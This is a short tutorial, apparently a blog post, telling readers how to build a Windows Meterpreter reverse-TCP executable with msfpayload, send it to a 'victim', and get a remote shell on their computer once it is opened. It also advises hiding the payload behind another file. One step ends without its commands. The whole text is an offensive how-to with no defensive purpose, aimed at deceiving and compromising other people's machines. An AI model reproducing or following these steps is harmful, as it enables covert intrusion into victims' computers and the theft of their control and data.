1. Open a terminal and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=(YOUR IP) LPORT=(CHOOSE A PORT) x > /root/Desktop/CHOOSE_A_FILE_NAME.exe
Now that our exploit is done:
2. Go to Metasploit console by typing msfconsole and type:
3. Now send the file to victim and as soon as they download and open it, there’s meterpreter shell on victim computer.
Thats it!
 
**It is important to hide the exploit behind other file.
Click here to see how to bind a file.

Post a Comment

 
Top